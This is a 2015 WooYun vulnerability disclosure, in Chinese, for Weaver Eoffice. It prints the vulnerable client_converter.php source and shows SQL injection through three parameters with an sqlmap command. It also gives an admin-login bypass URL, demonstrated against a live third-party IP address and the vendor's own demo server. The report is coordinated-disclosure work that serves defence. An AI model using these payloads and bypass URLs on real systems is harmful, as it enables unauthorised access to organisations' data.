当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0124503
漏洞标题:
泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台
相关厂商:
泛微Eoffice
漏洞作者:
Bear baby
提交时间:
2015-07-06 16:59
修复时间:
2015-10-06 15:26
公开时间:
2015-10-06 15:26
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向第三方安全合作伙伴开放
2015-09-01: 细节向核心白帽子及相关领域专家公开
2015-09-11: 细节向普通白帽子公开
2015-09-21: 细节向实习白帽子公开
2015-10-06: 细节向公众公开

简要描述:

表示还没收到过有$的洞,来一个试试

详细说明:

漏洞文件:/client_converter.php
代码如下:

<?php
/*********************/
/*                   */
/*  Version : 5.1.0  */
/*  Author  : RM     */
/*  Comment : 071223 */
/*                   */
/*********************/
session_start( );
include_once( "inc/conn.php" );
$userAccount = $_REQUEST['userAccount'];
$langID = $_REQUEST['lang'];
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID;
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );
$lang = $getLangFlagRow['LANG_AB'];
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];
$cursor = exequery( $connection, $query );
if ( $ROW1 = mysql_fetch_array( $cursor ) )
{
				$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];
}
$LOGIN_THEME = $ROW['THEME'];
$template = $ROW['TEMPLATE'];
if ( !$template )
{
				$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";
				$template_rs = exequery( $connection, $template_query );
				if ( $row_tp = mysql_fetch_array( $template_rs ) )
				{
								$template = $row_tp['TEMPLATE_NAME'];
				}
				else
				{
								$template = "8series";
				}
}
if ( $template == "8series" )
{
				$mainUrl = "/general/index8.php";
}
else if ( $template == "7series" )
{
				$mainUrl = "/general/index.php";
}
else
{
				$mainUrl = "index8.php";
}
if ( $LOGIN_THEME == "" )
{
				$LOGIN_THEME = "default";
}
$LOGIN_THEME = $template."/".$LOGIN_THEME;
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;
$targetType = $_REQUEST['target'];
$url = $_REQUEST['goto'];
$funcID = $_REQUEST['funcID'];
if ( $funcID != "" )
{
				$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; ";
				exequery( $connection, $query );
}
if ( $targetType == "blank" )
{
				header( "location:".$url );
}
else
{
				header( "location:".$mainUrl."?goto=".urlencode( $url ) );
}
?>


注入漏洞:
注入存在以下语句

$userAccount = $_REQUEST['userAccount'];
$langID = $_REQUEST['lang'];
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID; //lang直接进入sql


查询

$getLangFlagResult = exequery( $connection, $getLangFlagSQL );
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );
$lang = $getLangFlagRow['LANG_AB'];
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; //userAccount直接进入sql查询
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
……..省略代码……
$funcID = $_REQUEST['funcID'];
if ( $funcID != "" )
{
				$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; "; //funcID直接进入sql查询
				exequery( $connection, $query );
}


上面三处参数都是直接进入sql语句进行查询,导致注入

sqlmap.py -u "http://localhost/client_converter.php?userAccount=1&lang=1" --dbms=mysql --dbs


1.png


网上案例测试如下

2.png


绕过登录直接操作后台
问题存在如下代码:

$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];
$cursor = exequery( $connection, $query );
if ( $ROW1 = mysql_fetch_array( $cursor ) )
{
				$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];
}
……省略代码……
//userAccount参数进入SQL语句,查询UserAccount表,如记录存在 把USER_ID PASSWORD等值赋值到SESSION里面。
$LOGIN_THEME = $template."/".$LOGIN_THEME;
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;
再看后台验证功能的文件,/inc/auth.php。部分代码如下
session_start( );
include_once( "inc/utility.php" );
include_once( "inc/conn.php" );
global $_sess;
if ( !session_is_registered( "LOGIN_USER_ID" ) ) //LOGIN_USER_ID
{
				$url = $_SERVER['PHP_SELF'];
				echo "<script>\r\n\ttop.location.href='/login.php';\r\n\t</script>";
				exit( );
}
$_sess['lang'] = $_SESSION['LOGIN_LANG'];
$_sess['lg_theme'] = $_SESSION['LOGIN_THEME'];
$lang_file = "lang/".$_sess['lang']."/common.lang.php";
include_once( $lang_file );
includelangpak( "other" );
if ( $_SESSION['LOGIN_OA_ISPIRIT'] != "ispirit" )
{
				$sql = "SELECT * FROM SYS_PARA WHERE PARA_NAME = 'LIMIT_LOGIN_TIMES' ";
				$re = exequery( $connection, $sql );
				$row = mysql_fetch_array( $re );
				$lock = $row['PARA_VALUE'];
				if ( $lock == "1" )
				{
								$sid = session_id( );
								$uid = $_SESSION['LOGIN_USER_ID'];
								$sql = "SELECT SESSION_ID FROM user_online WHERE USER_ID='".$uid."'";
								$re = exequery( $connection, $sql );
								$row = mysql_fetch_array( $re );
								$row['SESSION_ID'];


该文件通过判断session里面的值进行用户验证。
利用方法:
先构造一个用户 如admin。访问client_converter.php?userAccount=用户名&lang=cn

3.png


出现报错,没关系,接下来直接访问后台主页 general/index8.php。可以访问了。

4.png


再访问个 用户管理页面general/system/user/userlist.php。

5.png


漏洞证明:

网上测试案例:
http://219.232.254.131:8082/client_converter.php?userAccount=admin&lang=cn
http://219.232.254.131:8082/general/system/user/userlist.php

7.png


8.png


官网
http://eoffice8.weaver.cn:8028/client_converter.php?userAccount=admin&lang=cn
http://eoffice8.weaver.cn:8028/general/system/user/userlist.php

10.png


11.png

修复方案:

严格过滤参数,加强安全意识。

版权声明:转载请注明来源 Bear baby@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-08 15:24

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无